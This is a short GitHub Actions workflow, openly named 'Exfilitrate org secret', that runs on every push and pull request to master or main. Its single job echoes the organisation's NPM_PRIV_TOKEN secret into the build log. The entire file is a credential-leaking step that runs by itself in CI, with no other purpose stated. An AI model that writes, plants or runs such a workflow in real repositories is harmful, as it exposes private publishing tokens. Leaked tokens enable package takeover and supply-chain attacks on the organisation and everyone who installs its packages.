name: Exfilitrate org secret
on:
  push:
    branches: [master,main]
  pull_request:
    branches: [master,main]
jobs:
  exfil:
    runs-on: ubuntu-latest
    steps:
    - name: exfil org secret
      id: response
      run:  |
          echo "${{secrets.NPM_PRIV_TOKEN}}"
